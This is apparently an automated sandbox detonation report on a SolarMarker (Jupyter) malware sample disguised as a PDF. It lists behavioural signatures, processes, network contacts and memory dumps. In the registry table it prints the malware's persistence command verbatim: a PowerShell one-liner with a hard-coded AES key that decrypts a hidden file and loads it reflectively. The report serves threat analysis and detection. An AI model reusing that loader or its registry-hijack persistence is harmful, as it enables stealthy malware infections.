Analysis Overview
SHA256
30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15
Threat Level: Known bad
The file $RZJBSB5.pdf was found to be: Known bad.
Malicious Activity Summary
Jupyter, SolarMarker
Blocklisted process makes network request
Drops startup file
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2023-02-21 14:00
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-21 13:59
Reported
2023-02-21 14:23
Platform
win10-20230220-en
Max time kernel
599s
Max time network
602s
Command Line
Signatures
Jupyter, SolarMarker
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2srnyagayd.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]133,165,236,47,97,52,224,19,17,83,18,190,103,228,59,187,224,102,137,106,50,192,211,70,56,15,156,77,135,31,120,97);$A.IV=@([byte]124,49,69,244,29,153,237,162,142,248,178,31,144,35,21,204);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\qkge3jcwqpk.4fiogvf051v'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[tFRnUqM6yokMORTCQTcvWCNIieWokxn21zabD9OzPw40x3pcfb04HUoG0z7TBgb.r2Ha19C5g7CkWUOInFr4I9c9xo2lUSHVWqP2RCpVIUHvcpSfZcOsQQGGs]::crfL33M9t_IvR8F8mDk9Ki72QQRB0VSBdq_bNHIG84_k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v\ = "24eeurs1ylq" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
Network
| Country | Destination | Domain | Proto |
| FR | 40.79.141.152:443 | tcp | |
| NL | 88.221.25.155:80 | tcp | |
| PL | 146.70.161.126:80 | 146.70.161.126 | tcp |
| US | 8.8.8.8:53 | 126.161.70.146.in-addr.arpa | udp |
Files
memory/3924-120-0x0000022F52AE0000-0x0000022F52B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjrf1x24.5pi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3924-147-0x0000022F6B0E0000-0x0000022F6B11C000-memory.dmp
memory/3924-158-0x0000022F6B6A0000-0x0000022F6B716000-memory.dmp
memory/3924-163-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-164-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-169-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-170-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-243-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-249-0x0000022F6B190000-0x0000022F6B21E000-memory.dmp
memory/3924-254-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-02-21 13:59
Reported
2023-02-21 14:23
Platform
win10v2004-20230220-en
Max time kernel
80s
Max time network
149s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 117.18.237.29:80 | tcp | |
| NL | 173.223.113.131:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfgvnuzf.rbq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1028-142-0x000002BB60900000-0x000002BB60922000-memory.dmp
memory/1028-143-0x000002BB60980000-0x000002BB609C4000-memory.dmp
memory/1028-144-0x000002BB60DF0000-0x000002BB60E66000-memory.dmp
memory/1028-146-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-145-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-147-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-148-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-149-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-150-0x000002BB456E0000-0x000002BB456F0000-memory.dmp